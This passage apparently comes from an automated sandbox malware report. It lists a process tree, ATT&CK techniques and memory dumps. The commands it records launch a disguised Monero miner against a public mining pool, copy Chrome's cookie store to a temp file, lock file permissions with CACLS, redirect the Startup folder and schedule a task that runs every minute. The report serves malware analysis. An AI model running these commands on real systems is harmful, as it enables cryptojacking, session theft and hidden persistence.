        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1860
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2124
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2692
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2348
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:808
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2660
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2336
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2304
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2724
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:3028
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1620
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1104
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2716
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2608
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:3024
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2316
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1408
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1716
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:808
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1392
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2420
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2668
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2332
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1696
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2976
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1524
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2304
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1620
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:972
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:2340
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1564
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:624
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8BFyHJmwhhxXo29aFXZrTJTWDbkiQFEsBBnj1VnHBcy9ZQ2NKEUGdKvZbWGRNYamgAgJ75jsX1bzDiVh21D5WShJPJVqaMU -p x -k -v=0 --donate-level=1 -t 1
        6⤵
        
        PID:1940
    - - C:\Users\Admin\AppData\Local\Temp\9b92a9b433b0c0d63dd84651491f6889c51e4ca0(1).exe
        
        "C:\Users\Admin\AppData\Local\Temp\9b92a9b433b0c0d63dd84651491f6889c51e4ca0(1).exe"
        5⤵
        
        PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon11df21ce74de.exe
    3⤵
    PID:812
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11df21ce74de.exe
      Mon11df21ce74de.exe
      4⤵
      PID:808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon11001ecd2e53bc.exe
    3⤵
    PID:1008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon116f38a1fa658e5.exe
    3⤵
    PID:1972
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon116f38a1fa658e5.exe
      Mon116f38a1fa658e5.exe
      4⤵
      PID:2172
    - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon116f38a1fa658e5.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon116f38a1fa658e5.exe
        5⤵
        
        PID:3048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon1111910dc7281.exe
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon111477d23a.exe
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon116fbfbd094.exe
    3⤵
    PID:1380
  - - C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon116fbfbd094.exe
      Mon116fbfbd094.exe
      4⤵
      PID:2104
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon112d70bc03b5.exe
    3⤵
    PID:1676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon11e659572da2322be.exe
    3⤵
    - Loads dropped DLL
    PID:1524

C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11e659572da2322be.exe
Mon11e659572da2322be.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:592
- C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11e659572da2322be.exe
  C:\Users\Admin\AppData\Local\Temp\7zS0C351EF5\Mon11e659572da2322be.exe
  2⤵
  PID:2756
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:N"
    3⤵
    PID:1860
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:2160
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:N"
      4⤵
      PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:R" /E
    3⤵
    PID:520
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:R" /E
      4⤵
      PID:336
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:N"
    3⤵
    PID:2636
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:2724
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:N"
      4⤵
      PID:2680
- - C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
    "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe"
    3⤵
    PID:2312
  - - C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
      C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
      4⤵
      PID:2380
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\6829558ede\
        5⤵
        
        PID:2900
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\6829558ede\
        6⤵
        
        PID:1772
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2344
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:R" /E
    3⤵
    PID:812
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:R" /E
      4⤵
      PID:2808

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2236
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:2244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:2320

C:\Users\Admin\AppData\Local\Temp\423E.exe
C:\Users\Admin\AppData\Local\Temp\423E.exe
1⤵
PID:2648

C:\Windows\system32\taskeng.exe
taskeng.exe {05034DE2-F2DE-49A8-B1BC-D1E81A6DC534} S-1-5-21-3846991908-3261386348-1409841751-1000:VQVVOAJK\Admin:Interactive:[1]
1⤵
PID:544
- C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
  C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
  2⤵
  PID:1776

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/432-259-0x0000000004080000-0x0000000004236000-memory.dmp

Filesize
1.7MB

Download
memory/592-277-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/592-278-0x00000000004A0000-0x00000000004A1000-memory.dmp

Filesize
4KB

Download
memory/592-246-0x0000000001270000-0x000000000138E000-memory.dmp

Filesize
1.1MB

Download
memory/592-250-0x0000000001270000-0x000000000138E000-memory.dmp

Filesize
1.1MB

Download
memory/808-292-0x0000000000530000-0x0000000000539000-memory.dmp

Filesize
36KB

Download
memory/924-223-0x0000000000400000-0x0000000000BF1000-memory.dmp

Filesize
7.9MB

Download
memory/960-54-0x0000000076151000-0x0000000076153000-memory.dmp

Filesize
8KB

Download
memory/1452-239-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/1452-205-0x0000000000C00000-0x0000000000C01000-memory.dmp

Filesize
4KB

Download
memory/1452-254-0x0000000002A00000-0x0000000002A01000-memory.dmp

Filesize
4KB

Download
memory/1452-255-0x0000000000900000-0x0000000000901000-memory.dmp

Filesize
4KB

Download
memory/1452-253-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/1452-252-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/1452-249-0x0000000002A10000-0x0000000002A11000-memory.dmp

Filesize
4KB

Download
memory/1452-248-0x00000000025B0000-0x00000000025B1000-memory.dmp

Filesize
4KB

Download
memory/1452-247-0x0000000000400000-0x00000000007FA000-memory.dmp

Filesize
4.0MB

Download
memory/1452-257-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/1452-244-0x00000000029F0000-0x00000000029F1000-memory.dmp

Filesize
4KB

Download
memory/1452-243-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/1452-242-0x00000000025E0000-0x00000000025E1000-memory.dmp

Filesize
4KB

Download
memory/1452-241-0x00000000025D0000-0x00000000025D1000-memory.dmp

Filesize
4KB

Download
memory/1452-240-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/1452-235-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/1452-238-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/1452-251-0x0000000000400000-0x00000000007FA000-memory.dmp

Filesize
4.0MB

Download
memory/1452-237-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/1452-245-0x00000000025C0000-0x00000000025C1000-memory.dmp

Filesize
4KB

Download
memory/1452-236-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/1452-234-0x0000000000B90000-0x0000000000B91000-memory.dmp

Filesize
4KB

Download
memory/1452-202-0x0000000000400000-0x00000000007FA000-memory.dmp

Filesize
4.0MB

Download
memory/1452-203-0x0000000000800000-0x0000000000860000-memory.dmp

Filesize
384KB

Download
memory/1452-204-0x0000000000BF0000-0x0000000000BF1000-memory.dmp

Filesize
4KB

Download
memory/1452-206-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

Filesize
4KB

Download
memory/1452-256-0x00000000003E0000-0x00000000003E1000-memory.dmp

Filesize
4KB

Download
memory/1452-207-0x0000000002550000-0x0000000002551000-memory.dmp

Filesize
4KB

Download
memory/1452-209-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

Filesize
4KB

Download
memory/1452-210-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/1452-211-0x0000000002570000-0x0000000002571000-memory.dmp

Filesize
4KB

Download
memory/1452-212-0x0000000000C10000-0x0000000000C11000-memory.dmp

Filesize
4KB

Download
memory/1452-214-0x0000000003600000-0x0000000003601000-memory.dmp

Filesize
4KB

Download
memory/1452-215-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/1452-216-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/1452-217-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/1452-218-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/1452-219-0x0000000000890000-0x0000000000891000-memory.dmp

Filesize
4KB

Download
memory/1452-220-0x00000000008A0000-0x00000000008A1000-memory.dmp

Filesize
4KB

Download
memory/1452-222-0x0000000000870000-0x0000000000871000-memory.dmp

Filesize
4KB

Download
memory/1452-221-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/1452-224-0x00000000008C0000-0x00000000008C1000-memory.dmp

Filesize
4KB

Download
memory/1452-225-0x00000000008F0000-0x00000000008F1000-memory.dmp

Filesize
4KB

Download
memory/1452-226-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/1452-228-0x0000000000B00000-0x0000000000B01000-memory.dmp

Filesize
4KB

Download
memory/1452-227-0x00000000035F0000-0x00000000035F1000-memory.dmp

Filesize
4KB

Download
memory/1452-229-0x0000000000B50000-0x0000000000B51000-memory.dmp

Filesize
4KB

Download
memory/1452-279-0x0000000005BB0000-0x0000000005BB1000-memory.dmp

Filesize
4KB

Download
memory/1452-230-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

Filesize
4KB

Download
memory/1452-200-0x0000000000400000-0x00000000007FA000-memory.dmp

Filesize
4.0MB

Download
memory/1452-231-0x0000000000B70000-0x0000000000B71000-memory.dmp

Filesize
4KB

Download
memory/1452-233-0x0000000000AE0000-0x0000000000AE1000-memory.dmp

Filesize
4KB

Download
memory/1452-232-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

Filesize
4KB

Download
memory/1548-83-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1548-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1548-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1548-86-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1548-87-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1548-88-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1548-85-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1548-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1548-89-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1548-78-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1548-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1548-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1548-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1548-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1548-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/2164-269-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/2164-267-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/2184-268-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/2184-270-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/2320-282-0x0000000000060000-0x00000000000AD000-memory.dmp

Filesize
308KB

Download
memory/2340-286-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads